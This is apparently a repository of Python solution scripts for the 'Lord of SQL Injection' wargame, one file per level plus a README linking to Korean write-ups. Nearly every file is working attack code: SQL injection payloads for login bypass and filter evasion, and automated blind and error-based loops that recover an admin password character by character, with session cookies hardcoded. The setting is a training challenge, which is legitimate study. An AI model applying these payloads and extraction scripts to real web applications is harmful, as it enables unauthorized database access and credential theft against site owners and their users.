├── 10_Skeleton.py
├── 11_Golem.py
├── 12_Darknight.py
├── 13_Bugbear.py
├── 14_Giant.py
├── 15_Assassin.py
├── 16_Zombie_Assassin.py
├── 17_Succubus.py
├── 18_Nightmare.py
├── 19_Xavis.py
├── 1_Gremline.py
├── 21_Iron_golem.py
├── 22_Dark_eyes.py
├── 2_Cobolt.py
├── 3_Goblin.py
├── 4_Orc.py
├── 5_Wolfman.py
├── 6_DarkElf.py
├── 7_Orge.py
├── 8_Troll.py
├── 9_Vampire.py
└── README.md


/10_Skeleton.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | #URL을 설정합니다.
 5 | url = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php"
 6 | param = "?pw=%27||id=%27admin%27%23"
 7 | new_url = url + param
 8 | 
 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | 
12 | 
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 | 
16 | if r.text.find("<h2>SKELETON Clear!</h2>") > 0:
17 |     print("축하합니다! Skeleton을 클리어했습니다!")
18 |     
19 | 


--------------------------------------------------------------------------------
/11_Golem.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | # coding: utf-8
  3 | 
  4 | import requests
  5 | import sys          # module for exit()
  6 | from sys import stdout      # module for fflush()
  7 | 
  8 | 
  9 | print("#### Lord of SQL Injection - Golem ####\n")
 10 | 
 11 | # URL을 설정합니다.
 12 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php"
 13 | 
 14 | session = raw_input("Input your LOS session : ")
 15 | # session = "lqaa55h0s48l8h06rc9sguktt0"
 16 | 
 17 | # Set header to set cookie
 18 | headers = {
 19 |     'Cookie': 'PHPSESSID={0}'.format(session)
 20 | }
 21 | 
 22 | 
 23 | """ The valuble for storing admin password """
 24 | password = ""
 25 | 
 26 | query = 0
 27 | 
 28 | 
 29 | 
 30 | """
 31 | No Hack Words : 
 32 |  - prob
 33 |  - _
 34 |  - .
 35 |  - ()
 36 |  - or
 37 |  - and
 38 |  - substr(
 39 |  - =
 40 | 
 41 | """
 42 | 
 43 | 
 44 | def replace(param):
 45 |     param = str(param)
 46 | 
 47 |     param = param.replace("or", "||")
 48 |     param = param.replace("and", "%26%26")
 49 |     param = param.replace("=", " like ")
 50 |     param = param.replace("substr(", "mid(")
 51 |     param = param.replace("#", "%23")
 52 | 
 53 |     if "prob" in param:
 54 |         print "Your param has 'prob'!"
 55 |         sys.exit()
 56 | 
 57 |     return param
 58 | 
 59 | 
 60 | 
 61 | # get the length of password 
 62 | for i in range(100):
 63 |     param = replace("' or length(pw)={0}#".format(i))
 64 |     content = requests.get(url + "?pw=" + param, headers=headers).text
 65 | 
 66 |     if content.find("<h2>Hello admin</h2>") > -1:
 67 |         length = i
 68 |         print "[*] The length of pw : {0}".format(i)
 69 |         
 70 |         break
 71 | 
 72 | 
 73 | 
 74 | print("\n\n#### Starting Blind SQL Injection ####\n")
 75 | for i in range(1, length + 1):
 76 |     binary = ''
 77 |     for j in range(0, 8):
 78 |         param = "?pw=' || id like 'admin' %26%26 (select mid(lpad(bin(ascii(mid(pw,{0},1))),7,0),{1},1) like 1)%23".format(i, j)
 79 |         content = requests.get(url + param, headers=headers).text
 80 |         query += 1
 81 | 
 82 |         if content.find("Hello admin") > 0:
 83 |             binary += '1'
 84 |         else:
 85 |             binary += '0'
 86 | 
 87 |     password += chr(int(binary, 2))
 88 | 
 89 |     print chr(int(binary, 2)), "({0})".format(binary)
 90 |     stdout.flush()
 91 | 
 92 | print "\n[*] the password : ", password
 93 | 
 94 | 
 95 | 
 96 | url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw={0}".format(password)
 97 | r = requests.get(url, headers=headers)
 98 | 
 99 | if r.text.find("<h2>GOLEM Clear!</h2>") > 0:
100 |     print "[*] message : Golem Clear!"
101 | 
102 | print "[*] total queries : {0}".format(query)
103 |     
104 | 


--------------------------------------------------------------------------------
/12_Darknight.py:
--------------------------------------------------------------------------------
 1 | # -*- coding : UTF-8 -*-
 2 | from requests import get
 3 | import string
 4 | 
 5 | print("#### Lord of SQL Injection - Darknight ####\n")
 6 | 
 7 | # URL을 설정합니다.
 8 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
 9 | 
10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | abc = string.digits + string.ascii_letters                  #ASCII의 문자를 저장합니다. (브루트포스할 때 필요)
13 | result = ""
14 | 
15 | #pw의 길이를 게싱합니다.
16 | for i in range(1,20):
17 |     param = "?no=1 || ord(id) like 97 %26%26length(pw) like " + str(i)
18 |     new_url = url + param
19 |     r = get(new_url, cookies=cookies)
20 | 
21 |     if r.text.find("<h2>Hello admin</h2>") > 0:
22 |         idLength = i + 1
23 |         print("pw의 길이는 " + str(i) + " 입니다.")
24 |         break
25 | 
26 | 
27 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다.
28 | print("\n\n#### Starting Blind SQL Injection ####\n")
29 | for i in range(1, idLength):
30 |     for a in abc:
31 |         param = "?no=1 or ord(id) like 97 %26%26 ord(mid(pw," + str(i) + ",1)) <> " + str(ord(a))
32 |         new_url = url + param
33 |         r = get(new_url, cookies=cookies)
34 | 
35 |         if r.text.find("<h2>Hello admin</h2>") == -1:
36 |             print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
37 |             result += a
38 |             break
39 | 
40 |     if i == 1 and result == "":
41 |         print("FAIL")
42 |         exit(-1)
43 | 
44 |     if i == idLength-1:
45 |         print("\n\n#### RESULT ####")
46 |         print("pw : " + result)
47 | 
48 | url = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=" + result
49 | r = get(url, cookies=cookies)
50 | 
51 | if r.text.find("<h2>DARKKNIGHT Clear!</h2>") > 0:
52 |     print("축하합니다! Darknight를 클리어했습니다.")
53 |     
54 | 


--------------------------------------------------------------------------------
/13_Bugbear.py:
--------------------------------------------------------------------------------
 1 | # -*- coding : UTF-8 -*-
 2 | from requests import get
 3 | import string
 4 | 
 5 | print("#### Lord of SQL Injection - Bugbear ####\n")
 6 | 
 7 | # URL을 설정합니다.
 8 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php"
 9 | 
10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | abc = string.digits + string.ascii_letters                  #ASCII의 문자를 저장합니다. (브루트포스할 때 필요)
13 | result = ""
14 | 
15 | #pw의 길이를 게싱합니다.
16 | for i in range(1,20):
17 |     param = "?no=1||hex(mid(id,1,1))in(61)%26%26length(pw)<>" + str(i)
18 |     new_url = url + param
19 |     r = get(new_url, cookies=cookies)
20 | 
21 |     if r.text.find("<h2>Hello admin</h2>") == -1:
22 |         idLength = i + 1
23 |         print("pw의 길이는 " + str(i) + " 입니다.")
24 |         break
25 | 
26 | 
27 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다.
28 | print("\n\n#### Starting Blind SQL Injection ####\n")
29 | for i in range(1, idLength):
30 |     for a in abc:
31 |         ab = str(hex(ord(a))).replace("0x", "")
32 |         param = "?no=1||hex(mid(id,1,1))in(61)%26%26hex(mid(pw," + str(i) + ",1))<>" + ab
33 |         new_url = url + param
34 |         r = get(new_url, cookies=cookies)
35 | 
36 |         if r.text.find("<h2>Hello admin</h2>") == -1:
37 |             print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
38 |             result += a
39 |             break
40 | 
41 |     if i == 1 and result == "":
42 |         print("FAIL")
43 |         exit(-1)
44 | 
45 |     if i == idLength-1:
46 |         print("\n\n#### RESULT ####")
47 |         print("pw : " + result)
48 | 
49 | url = "http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=" + result
50 | r = get(url, cookies=cookies)
51 | 
52 | if r.text.find("<h2>BUGBEAR Clear!</h2>") > 0:
53 |     print("축하합니다! Bugbear를 클리어했습니다.")
54 |     
55 | 


--------------------------------------------------------------------------------
/14_Giant.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | import random
 4 | 
 5 | #URL을 설정합니다.
 6 | url = "http://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php"
 7 | 
 8 | #유효한 개행 문자들을 저장합니다.
 9 | new_tab = ["%0b", "%0c"]
10 | 
11 | #위의 개행 문자 둘 중 하나를 선택합니다.
12 | rand_int = random.randint(0,1)
13 | param = "?shit=" + new_tab[rand_int]
14 | new_url = url + param
15 | 
16 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
17 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
18 | 
19 | 
20 | #HTTP 요청을 보냅니다.
21 | r = get(new_url, cookies=cookies)
22 | 
23 | if r.text.find("<h2>GIANT Clear!</h2>") > 0:
24 |     print("축하합니다! Giant을 클리어했습니다!")
25 |     
26 | 


--------------------------------------------------------------------------------
/15_Assassin.py:
--------------------------------------------------------------------------------
 1 | # -*- coding : UTF-8 -*-
 2 | from requests import get
 3 | import string
 4 | 
 5 | print("#### Lord of SQL Injection - Assassin ####\n")
 6 | 
 7 | # URL을 설정합니다.
 8 | url = "http://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php"
 9 | 
10 | #쿠키를 세팅합니다. 반드시 당신의 쿠키로 설정해야 합니다.
11 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | 
13 | #ASCII의 문자를 저장합니다. (브루트포스할 때 필요)
14 | abc = string.digits + string.ascii_letters
15 | 
16 | result = ""
17 | 
18 | #얻은 정보를 바탕으로 블라인드 SQL Injection을 진행합니다.
19 | print("\n\n#### Starting Blind SQL Injection ####\n")
20 | identify = 0
21 | for i in range(1,20):
22 |     for a in abc:
23 |         param = "?pw=" + result + a + "%"
24 |         new_url = url + param
25 |         r = get(new_url, cookies=cookies)
26 | 
27 |         if r.text.find("<h2>Hello guest</h2>") > 0:
28 |             identify = 1
29 |             print(str(i) + "번 째 pw의 값은 '" + a + "' 입니다. ")
30 |             result += a
31 |             if r.text.find("<h2>ASSASSIN Clear!</h2>") > 0:
32 |                 print("축하합니다! Orge를 클리어했습니다.")
33 | 
34 |         
35 |     if len(result) < (i-1):
36 |         break
37 | 
38 | print("\n\n#### RESULT ####")
39 | print("pw : " + result)
40 | 


--------------------------------------------------------------------------------
/16_Zombie_Assassin.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | #URL을 설정합니다.
 5 | url = "http://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php"
 6 | param = "?pw=%00%27or%271%27=%271"
 7 | new_url = url + param
 8 | 
 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | 
12 | 
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 | 
16 | if r.text.find("<h2>ZOMBIE_ASSASSIN Clear!</h2>") > 0:
17 |     print("축하합니다! Zombie assassin을 클리어했습니다!")
18 |     
19 | 


--------------------------------------------------------------------------------
/17_Succubus.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | #URL을 설정합니다.
 5 | url = "http://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php"
 6 | param = "?id=asdf\&pw=or%201=1%23"
 7 | new_url = url + param
 8 | 
 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | 
12 | 
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 | 
16 | if r.text.find("<h2>SUCCUBUS Clear!</h2>") > 0:
17 |     print("축하합니다! Succubus를 클리어했습니다!")
18 |     
19 | 


--------------------------------------------------------------------------------
/18_Nightmare.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | #URL을 설정합니다.
 5 | url = "http://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php"
 6 | param = "?pw=%27)<1;%00"
 7 | new_url = url + param
 8 | 
 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | 
12 | 
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 | 
16 | if r.text.find("<h2>NIGHTMARE Clear!</h2>") > 0:
17 |     print("축하합니다! Nightmare를 클리어했습니다!")
18 |     
19 | 


--------------------------------------------------------------------------------
/19_Xavis.py:
--------------------------------------------------------------------------------
 1 | # -*- coding : UTF-8 -*-
 2 | # pw의 모든 값의 아스키값이 160이 넘기 때문에 효율성 문제로 160부터 시작했습니다.
 3 | import requests
 4 | 
 5 | # Set cookies
 6 | cookies = dict(PHPSESSID='gsen5qt14q70cvj5doeee5lvp1')
 7 | 
 8 | result = ""
 9 | hexacode = '0x'
10 | for i in range(1,11):
11 |     print("-" * 25)
12 |     print("[=] Testing %d character" % i)
13 |     print('-' * 25)
14 |     for ascii in range(160, 1000):
15 |         if i == 2 or i == 6:
16 |             ascii += 40
17 |         url = 'http://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php'
18 |         url += "?pw=1'||ord(id)=97%26%26ord(mid(pw,{0},1))={1}%23".format(i, ascii)
19 |         #print "[=] Testing url : " + url
20 | 
21 |         r = requests.get(url, cookies=cookies)
22 | 
23 |         if r.text.find("Hello admin") > -1:
24 |             char = chr(ascii)
25 |             hexacode += str(hex(ascii)).replace('0x', '')
26 |             print("\n[*] %d character is %s (ascii code : %d)\n\n" % (i, char, ascii))
27 |             result += char
28 |             break
29 | 
30 | print("\n\n\n[*] admin's password : %s(hexacode : %s)" % (result, hexacode))
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/1_Gremline.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # coding: utf-8
 3 | 
 4 | from requests import get
 5 | 
 6 | 
 7 | url = "http://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php"
 8 | 
 9 | # Set PHPSESSID by user input
10 | session = input("Input your LOS session : ")
11 | # session = "gequo9hff2f19sjmieftjnuf50"
12 | 
13 | headers = {
14 | 	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
15 | 	'Accept-Encoding': 'gzip, deflate, br',
16 | 	'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
17 | 	'Cookie': 'PHPSESSID={0}'.format(session)
18 | }
19 | 
20 | param = "?id='or'1'='1'%23"
21 | 
22 | r = get(url + param , headers=headers)
23 | 
24 | if r.text.find("<h2>GREMLIN Clear!</h2>") > 0:
25 |     print("Gremlin Clear!")
26 | 


--------------------------------------------------------------------------------
/21_Iron_golem.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # coding: utf-8
 3 | import requests
 4 | 
 5 | # Set cookies
 6 | cookies = dict(PHPSESSID="gequo9hff2f19sjmieftjnuf50")
 7 | 
 8 | 
 9 | 
10 | # pw Length guessing
11 | print("Starting pw guessing")
12 | for i in range(1, 100):
13 |     url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
14 |     payload = "?pw=1'||if(length(pw)="+str(i)+",1,(select%201%20union%20select%202))%23"
15 |     url += payload
16 | 
17 |     r = requests.get(url, cookies=cookies)
18 |     if r.text.find("Subquery returns more than 1 row") > -1:
19 |         print("[*] pw의 길이는 %2d가 아닙니다. " % i)
20 |     else :
21 |         print("[*] pw의 길이는 %2d입니다!" % i)
22 |         length = i
23 |         break
24 | 
25 | 
26 | # start pwning
27 | print("\n\n\n")
28 | print("[+] Configuring pw")
29 | for i in range(1, length+1):
30 |     pwn = 31
31 |     url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
32 |     payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))>"+str(pwn)+",1,(select%201%20union%20select%202))%23"
33 |     url += payload
34 | 
35 |     r = requests.get(url, cookies=cookies)
36 |     if r.text.find("Subquery returns more than 1 row") > -1:
37 |         print("[*] pw의 %2d번째에 값이 없습니다." % (i))
38 |     else :
39 |         print("[*] pw의 %2d번째에 값이 있습니다!" % (i))
40 | 
41 | 
42 | print("\n\n\n")
43 | result = ""
44 | print("[+] Starting to pwn")
45 | for i in range(1,5):
46 |     for j in range(pwn, 100):
47 |         url = "http://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
48 |         payload = "?pw=1%27||if(ord(mid(pw,"+str(i)+",1))="+str(j)+",1,(select%201%20union%20select%202))%23"
49 |         url += payload
50 | 
51 |         r = requests.get(url, cookies=cookies)
52 |         if r.text.find("Subquery returns more than 1 row") > -1:
53 |             print("[*] pw의 %d번째 값은 %d가 아닙니다. " % (i, j))
54 |         else :
55 |             print("[*] pw의 %d번째 값은 %d입니다! " % (i, j))
56 |             result += chr(j)
57 |             break
58 | 
59 | print("\n\n\n[+] result : " + result + "\n")
60 | 


--------------------------------------------------------------------------------
/22_Dark_eyes.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding : UTF-8 -*-
 3 | 
 4 | import requests
 5 | import string
 6 | 
 7 | # url encoding
 8 | def urlQuery(url):
 9 |     url = url.replace("#", "%23")
10 |     url = url.replace(" ", "%20")
11 |     url = url.replace("'", "%27")
12 |     url = url.replace("&", "%26%26")
13 |     url = url.replace(">", "%3E")
14 |     url = url.replace("<", "%3C")
15 | 
16 |     return url
17 | 
18 | cookies = dict(PHPSESSID="8nprcactb6uekd9ocb96q3fh17")
19 | url = "http://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"
20 | 
21 | 
22 | abc = string.ascii_letters + string.digits + "!@#$%^&*()_-{}[];:><,./?"
23 | 
24 | # select * from test where id='admin' and pw='' or ord(id)=97 and (length(pw)=0 or (select 1 union select pw))
25 | 
26 | 
27 | 
28 | # pw length config
29 | print("[+] pw length config \n")
30 | for i in range(0, 100):
31 |     payload = "?pw=' OR ord(id)=97 and (length(pw)=" + str(i) + " or (select 1 union select pw))#"
32 |     payload = urlQuery(payload)
33 |     r = requests.get(url+payload, cookies=cookies)
34 | 
35 |     if len(r.text) < 5:
36 |         print("[-] Err0r was f0und. - the length of the 'pw' is not " + str(i))
37 |     else :
38 |         print("[*] the length of 'pw' is " + str(i))
39 |         length = i
40 |         break
41 | 
42 | result = ""
43 | print("\n\n=====================\n\nblind sqli start\n")
44 | for i in range(1, (length+1)):
45 |     for a in abc:
46 |         payload = "?pw=' OR ord(id)=97 AND (ord(mid(pw,"+str(i)+",1))="+str(ord(a))+\
47 |                   " or (select 1 union select pw))%23"
48 | 
49 |         r = requests.get(url+payload, cookies=cookies)
50 | 
51 |         if len(r.text) < 5:
52 |             print("[-] Err0r was f0und. (%d, %c)" %(i, a))
53 |         else:
54 |             print("[*] the %d pw is %c" % (i, a))
55 |             result += a
56 |             break
57 | 
58 | print("[=] the result : " + result)
59 | 


--------------------------------------------------------------------------------
/2_Cobolt.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # coding: utf-8
 3 | import requests
 4 | 
 5 | url = "http://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php"
 6 | param = "?id=admin'%23"
 7 | 
 8 | cookie = input("Input your session : ")
 9 | # cookie = "5u71g5vp7547tv8ffl7osl0fl5"
10 | 
11 | headers = {
12 |     'Cookie': cookie
13 | }
14 | 
15 | r = requests.get(url + param, headers=headers)
16 | 
17 | if r.text.find("<h2>COBOLT Clear!</h2>") > 0:
18 |     print("Cobolt Clear!")
19 | 


--------------------------------------------------------------------------------
/3_Goblin.py:
--------------------------------------------------------------------------------
 1 | # -*- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | url = "http://los.eagle-jump.org/goblin_5559aacf2617d21ebb6efe907b7dded8.php"
 5 | #MySQL의 substr() 함수를 이용하여 문제를 풉니다.
 6 | param = "?no=0%20or%20ascii(substr(id,1,1))=97"
 7 | 
 8 | new_url = url + param
 9 | 
10 | #쿠리를 설정합니다. 반드시 당신의 쿠키로 설정해주세요.
11 | cookie = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
12 | 
13 | 
14 | r = get(new_url, cookies=cookie)
15 | if r.text.find("<h2>GOBLIN Clear!</h2>") > 0:
16 |     print("축하합니다! Goblin을 클리어했습니다!")
17 | 


--------------------------------------------------------------------------------
/4_Orc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: UTF-8 -*-
 3 | import requests
 4 | from sys import stdout
 5 | 
 6 | query = 0
 7 | print("#### Lord of SQL Injection - Orc ####\n")
 8 | 
 9 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
10 | 
11 | 
12 | # session = "gequo9hff2f19sjmieftjnuf50"
13 | session = raw_input("Input your LOS session : ")
14 | 
15 | headers = {
16 |     'Cookie': 'PHPSESSID={0}'.format(session)
17 | }
18 | 
19 | password = ""
20 | 
21 | # get the length of password
22 | for i in range(100):
23 |     param = "?pw=' or id='admin' and length(pw)={0}%23".format(i)
24 | 
25 |     content = requests.get(url + param, headers=headers).text
26 |     query += 1
27 | 
28 |     if content.find("Hello admin") > -1:
29 |         length = i
30 |         print "[*] The length of admin password : {0}".format(i)
31 |         break
32 | 
33 | 
34 | print("\n\n#### Starting Blind SQL Injection ####\n")
35 | #  substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)
36 | 
37 | print "[*] the password : ",
38 | stdout.flush()
39 | 
40 | for i in range(1, length+1):
41 | 
42 |     binary = ''
43 |     for j in range(0, 8):
44 |         param = "?pw=' or id='admin' and (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
45 |         content = requests.get(url + param, headers=headers).text
46 |         query += 1
47 | 
48 |         if content.find("Hello admin") > 0:
49 |             binary += '1'
50 |         else:
51 |             binary += '0'
52 | 
53 |     password += chr(int(binary, 2))
54 | 
55 |     print chr(int(binary, 2)),
56 |     stdout.flush()
57 | 
58 | print "\n[*] the password : ", password
59 | 
60 | 
61 | url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw={0}".format(password)
62 | content = requests.get(url + param, headers=headers).content
63 | 
64 | if content.find("<h2>ORC Clear!</h2>") > 0:
65 |     print "ORC Clear!"
66 | 
67 | print "[+] total query : {0}".format(query)


--------------------------------------------------------------------------------
/5_Wolfman.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # coding: utf-8
 3 | 
 4 | import requests
 5 | import urllib
 6 | 
 7 | 
 8 | def urlencode(query):
 9 |     replacement = {
10 |         '#': '%23',
11 |         '&': '%26',
12 |         ' ': '%20',
13 |         '=': '%3D',
14 |         '+': '%2B',
15 |         '\'': '%27',
16 |         '%': '%25'
17 |     }
18 | 
19 |     for r in replacement:
20 |         query.replace(r, replacement[r])
21 | 
22 |     return query
23 | 
24 | #URL을 설정합니다.
25 | url = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"
26 | param = urlencode("?pw='||id='admin'%23")
27 | 
28 | 
29 | session = input("Input your LOS session : ")
30 | headers = {
31 |     'Cookie': 'PHPSESSID={0}'.format(session)
32 | }
33 | 
34 | 
35 | r = requests.get(url + param, headers=headers)
36 | 
37 | if r.text.find("<h2>WOLFMAN Clear!</h2>") > 0:
38 |     print "Wolfman Clear!"
39 |     
40 | 


--------------------------------------------------------------------------------
/6_DarkElf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # coding: utf-8
 3 | 
 4 | import requests
 5 | 
 6 | url = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"
 7 | param = "?pw=%27||id=%27admin"
 8 | 
 9 | session = raw_input("Input your LOS session : ")
10 | # session = "gequo9hff2f19sjmieftjnuf50"
11 | 
12 | headers = {
13 |     'Cookie': 'PHPSESSID={0}'.format(session)
14 | }
15 | 
16 | 
17 | r = requests.get(url + param, headers=headers)
18 | 
19 | if r.text.find("<h2>DARKELF Clear!</h2>") > 0:
20 |     print("DarkElf Clear!")
21 |     
22 | 


--------------------------------------------------------------------------------
/7_Orge.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # coding: utf-8
 3 | 
 4 | import requests
 5 | from sys import stdout
 6 | 
 7 | print("#### Lord of SQL Injection - Orge ####\n")
 8 | 
 9 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
10 | 
11 | session = raw_input("Input your LOS session : ")
12 | # session = "lqaa55h0s48l8h06rc9sguktt0"
13 | 
14 | headers = {
15 |     'Cookie': 'PHPSESSID={0}'.format(session)
16 | }
17 | 
18 | password = ""
19 | query = 0
20 | 
21 | 
22 | # guess the length of password
23 | for i in range(100):
24 |     param = "?pw=' || id='admin' %26%26 length(pw)={0}%23".format(i)
25 |     r = requests.get(url + param, headers=headers)
26 |     query += 1
27 | 
28 |     if r.text.find("<h2>Hello admin</h2>") > 0:
29 |         length = i
30 |         print "[*] The length of 'pw' is {0}".format(i)
31 |         break
32 | 
33 | 
34 | 
35 | 
36 | print("\n\n#### Starting Blind SQL Injection ####\n")
37 | for i in range(1, length + 1):
38 |     binary = ''
39 |     for j in range(0, 8):
40 |         param = "?pw=' || id='admin' %26%26 (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
41 |         content = requests.get(url + param, headers=headers).text
42 |         query += 1
43 | 
44 |         if content.find("Hello admin") > 0:
45 |             binary += '1'
46 |         else:
47 |             binary += '0'
48 | 
49 |     password += chr(int(binary, 2))
50 | 
51 |     print chr(int(binary, 2)), "({0})".format(binary)
52 |     stdout.flush()
53 | 
54 | print "\n[*] the password : ", password
55 | 
56 | 
57 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=" + password
58 | r = requests.get(url, headers=headers)
59 | 
60 | if r.text.find("<h2>ORGE Clear!</h2>") > 0:
61 |     print "[*] message : Orge Clear!"
62 |     
63 | print "[*] total queries : {0}".format(query)


--------------------------------------------------------------------------------
/8_Troll.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | #URL을 설정합니다.
 5 | url = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php"
 6 | param = "?id=admIn"
 7 | new_url = url + param
 8 | 
 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | 
12 | 
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 | 
16 | if r.text.find("<h2>TROLL Clear!</h2>") > 0:
17 |     print("축하합니다! Troll을 클리어했습니다!")
18 |     
19 | 


--------------------------------------------------------------------------------
/9_Vampire.py:
--------------------------------------------------------------------------------
 1 | # - *- coding : UTF-8 -*-
 2 | from requests import get
 3 | 
 4 | #URL을 설정합니다.
 5 | url = "http://los.eagle-jump.org/vampire_0538b0259b6680c1ca4631a388177ed4.php"
 6 | param = "?id=admadminin"
 7 | new_url = url + param
 8 | 
 9 | #쿠키를 설정합니다. 쿠키는 반드시 자신의 것이어야합니다.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | 
12 | 
13 | #HTTP 요청을 보냅니다.
14 | r = get(new_url, cookies=cookies)
15 | 
16 | if r.text.find("<h2>VAMPIRE Clear!</h2>") > 0:
17 |     print("축하합니다! Vampire을 클리어했습니다!")
18 |     
19 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Lord-of-SQL-Injection
 2 | Lord of SQL Injection (주석은 한글로 작성되어 있습니다. / Comments were written in Korean!)
 3 | 
 4 | 1. Gremlin : http://chaneyoon.tistory.com/51
 5 | 2. Cobolt : http://chaneyoon.tistory.com/52
 6 | 3. Goblin : http://chaneyoon.tistory.com/53
 7 | 4. Orc : http://chaneyoon.tistory.com/54
 8 | 5. Wolfman : http://chaneyoon.tistory.com/55
 9 | 6. Darkelf : http://chaneyoon.tistory.com/56
10 | 7. Orge : http://chaneyoon.tistory.com/57
11 | 8. Troll : http://chaneyoon.tistory.com/58
12 | 9. Vampire : http://chaneyoon.tistory.com/59
13 | 10. Skeleton : http://chaneyoon.tistory.com/60
14 | 11. Golem : http://chaneyoon.tistory.com/61
15 | 12. Darknight : http://chaneyoon.tistory.com/62
16 | 13. Bugbear : http://chaneyoon.tistory.com/63
17 | 14. Giant : http://chaneyoon.tistory.com/64
